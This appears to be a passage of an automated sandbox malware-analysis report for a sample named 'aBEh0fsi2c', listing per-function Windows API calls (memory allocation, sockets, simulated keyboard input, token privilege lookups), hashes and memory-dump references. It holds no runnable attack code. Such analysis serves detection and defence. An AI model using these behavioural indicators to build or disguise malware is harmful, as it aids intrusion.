Instruction ID: 5e652dd15887d81e51f44bfac44828cca7873abda4e2a21319e3dedd20ec9885
Opcode Fuzzy Hash: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
Instruction Fuzzy Hash: 9AD01735510723CFDB229F32E85874676E8AF05351F13CA3FD48ADA690EAB4C880CA90

Function 003A1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003A1718
__swprintf.LIBCMT ref: 003A1749

Strings

WIN_XPe, xrefs: 003A1788
%.3d, xrefs: 003A1723

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
Instruction ID: 7bdf92f2429b0020381a5085dad51bfac6222465f8651f8de341f10a677dd8ff
Opcode Fuzzy Hash: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
Instruction Fuzzy Hash: 32D01776844218FACB139A90D8888F9737CEB1A701F242562F906E2480E2668B94EA25

Function 003B717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
Instruction ID: 75c7434478536c31fe61a8054f759a715756ab06fe74d10f4ec6de7b5e2c204e
Opcode Fuzzy Hash: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
Instruction Fuzzy Hash: 44C18174A04216EFCB15CFA5C884EAEBBF5FF88308B154598E909EB651D730DD41DB90

Function 003DE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 003DE0BE
CharLowerBuffW.USER32(?,?), ref: 003DE101

Part of subcall function 003DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003DE301
_memmove.LIBCMT ref: 003DE314

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 19d5e7ab4d194b4a043ceff9707cf93327f3a2b814bee0af7694a9244e5cfeef
Instruction ID: 713bf34ec8d645bd54d3951bab64149f0bae6587d0dbe6285491ac7b77ce3654
Opcode Fuzzy Hash: 19d5e7ab4d194b4a043ceff9707cf93327f3a2b814bee0af7694a9244e5cfeef
Instruction Fuzzy Hash: 75C14876608301DFC716EF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB81

Function 003D8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003D80C3
CoUninitialize.OLE32 ref: 003D80CE

Part of subcall function 003BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4

VariantInit.OLEAUT32(?), ref: 003D80D9
VariantClear.OLEAUT32(?), ref: 003D83AA

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: a6c03938745b103a0c767b17d99a700ecbaf9b88c70c62c7222bc1e6bbccfddc
Instruction ID: f1c1336f6a5de5d6913a32b4fce5dfec0d2499668b48889e310cf81e8984f0e8
Opcode Fuzzy Hash: a6c03938745b103a0c767b17d99a700ecbaf9b88c70c62c7222bc1e6bbccfddc
Instruction Fuzzy Hash: 77A1497A6047019FCB12DF54D481B2AB7E8BF89714F04885AF9999B3A1CB30FD05CB41

Function 003B687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003B688E
SysAllocString.OLEAUT32(00000000), ref: 003B6937
VariantCopy.OLEAUT32 ref: 003B6966
VariantClear.OLEAUT32(?), ref: 003B698D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 0c15aabdf73b45d8f4ec79251977ef0a143e22971d17adab69a5568488f0f968
Instruction ID: 5fd3f07705aa7404cbcfd91b577db3e07fc4c27bed1a727175aed8afb8a8ae94
Opcode Fuzzy Hash: 0c15aabdf73b45d8f4ec79251977ef0a143e22971d17adab69a5568488f0f968
Instruction Fuzzy Hash: F251CA747003419ECF26AF65D892AB9B3E99F44314F20C81FE686DBA93DB78D8448701

Function 003E97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00E0E240,?), ref: 003E9863
ScreenToClient.USER32(00000002,00000002), ref: 003E9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003E9903

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
Instruction ID: 5134029084ab330596af01d64ca70d4e89d5928108c044c289e3101504fb0efc
Opcode Fuzzy Hash: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
Instruction Fuzzy Hash: 16515F34A00258EFCF22DF25D880AAE7BB5FF45360F15826AF8559B2E1D770AD41CB90

Function 003B9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003B9AD2
__itow.LIBCMT ref: 003B9B03

Part of subcall function 003B9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003B9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 003B9B6C
__itow.LIBCMT ref: 003B9BC3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
Instruction ID: 8a2407781863a176dc340eee350bc567ca61c560ebe7fee79a90469c347dabd9
Opcode Fuzzy Hash: 5425c34b36e4636b67c41664fe13cdd88f10a2b150b98e9aabc455879d555e48
Instruction Fuzzy Hash: 5A419670A00308ABDF16EF54D845BFE7BB9EF44718F40406AFA05AB291DB709E44CBA1

Function 003D69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 003D69D1
WSAGetLastError.WSOCK32(00000000), ref: 003D69E1

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003D6A45
WSAGetLastError.WSOCK32(00000000), ref: 003D6A51

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
Instruction ID: d2fce5d8bf8180337b7281bc9c1da5545343c04853619bef49ec19fed75ac7de
Opcode Fuzzy Hash: e59a33313aad496c02c3aeea1157b7c2de1a8d666b4660a8ca7ada9e77855f49
Instruction Fuzzy Hash: 30419175640200AFEB62AF64DC87F2A77E89F19B54F04C519FA59AF3C2DAB09D008791

Function 003D641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,003EF910), ref: 003D64A7
_strlen.LIBCMT ref: 003D64D9

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4f463eac2f01081f95f643d0e59cb2721498434885db7b519b4e7f37e9d79159
Instruction ID: 07842bdea16d38c6951b41292ea44df737e763c0363147d1518ca3e5b6ad5450
Opcode Fuzzy Hash: 4f463eac2f01081f95f643d0e59cb2721498434885db7b519b4e7f37e9d79159
Instruction Fuzzy Hash: A041A572500104AFCB16EBA4EC96FAEB7ADAF05310F108156F9259F396DB30AD44CB50

Function 003CB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003CB89E
GetLastError.KERNEL32(?,00000000), ref: 003CB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003CB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003CB915

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
Instruction ID: 605ec88d26b1d58e6d398734a678d0d5cd68e5cf8cd74f5e1ed01faa63d6b293
Opcode Fuzzy Hash: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
Instruction Fuzzy Hash: CE41E439600A50DFCB12EF55C485B59BBE9AF4A310F19C099ED4AAF366CB31ED01CB91

Function 003E8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E88DE

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
Instruction ID: 4c762f31e3f71fa64dd272ad166239cd3a1fe16ff801daa35e73f02f70148e12
Opcode Fuzzy Hash: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
Instruction Fuzzy Hash: 21310530E001A8AFEF239B56DC45BB837A4EB05310F914711F919EA1E2CF7199409752

Function 003EAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 003EAB60
GetWindowRect.USER32(?,?), ref: 003EABD6
PtInRect.USER32(?,?,003EC014), ref: 003EABE6
MessageBeep.USER32(00000000), ref: 003EAC57

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
Instruction ID: c1c2e4f7149f725506be329786eb6ff6e2b7218674bc5fdb9eba2694e143e278
Opcode Fuzzy Hash: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
Instruction Fuzzy Hash: 244160306009A9DFCB22DF5AD884B697BF5FB49310F2582A9E415DF2A0D770B841CB92

Function 003C0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 003C0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003C0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003C0BFB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
Instruction ID: 891f362f0a52270a289d1800fcfec849ce1630620c325cd2fb3e5cfe17366544
Opcode Fuzzy Hash: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
Instruction Fuzzy Hash: 93312630A40688EEFB3ACB258C05FFABBA9AB45328F04435EE595D61D1C3B5CD409761

Function 003C0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003C0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 003C0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 003C0CE1
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003C0D33

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
Instruction ID: 5ba73dddf51b2fef59ed215289d82cd8bf0dfc30aec5eb8b96a2cb97837f28c6
Opcode Fuzzy Hash: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
Instruction Fuzzy Hash: B3314630940798EEFF3A8B648C08FFEBB6AAB45314F04832EE491EA5D1C3799D458751

Function 003961C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003961FB
__isleadbyte_l.LIBCMT ref: 00396229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00396257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0039628D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
Instruction ID: b0deb9e1048abb936c43deeb1fab6caeee7d7a9cd5e1f49dd7962c8796079bb3
Opcode Fuzzy Hash: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
Instruction Fuzzy Hash: 7831D230606246AFDF239F75CC46BAA7BB9FF41310F164529E8A48B191D730E950D790

Function 003E4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 003E4F02

Part of subcall function 003C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C365B
Part of subcall function 003C3641: GetCurrentThreadId.KERNEL32 ref: 003C3662
Part of subcall function 003C3641: AttachThreadInput.USER32(00000000,?,003C5005), ref: 003C3669

GetCaretPos.USER32(?), ref: 003E4F13
ClientToScreen.USER32(00000000,?), ref: 003E4F4E
GetForegroundWindow.USER32 ref: 003E4F54

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
Instruction ID: 415c53682aede030c64b5a58ff253fb393b06c0d6865644bd50aeffbba88da44
Opcode Fuzzy Hash: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
Instruction Fuzzy Hash: 79313EB1D00108AFCB11EFA5C885EEFB7FDEF99304F10816AE415EB241DA719E058BA1

Function 003EC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

GetCursorPos.USER32(?), ref: 003EC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039B9AB,?,?,?,?,?), ref: 003EC4E7
GetCursorPos.USER32(?), ref: 003EC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039B9AB,?,?,?), ref: 003EC56E

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
Instruction ID: 27b1a84bf19492f4f8d5f4a8bcdd01b1e26aa2cb1ee72ce5847d183cacb5d3b1
Opcode Fuzzy Hash: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
Instruction Fuzzy Hash: 0B31E5356100A8AFCF228F5AC898EFE7BB9EB0A310F404265F9058B2E1C7316D51DF94

Function 003B8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
Part of subcall function 003B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
Part of subcall function 003B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
Part of subcall function 003B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003B86A3
_memcmp.LIBCMT ref: 003B86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B86FC
HeapFree.KERNEL32(00000000), ref: 003B8703

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
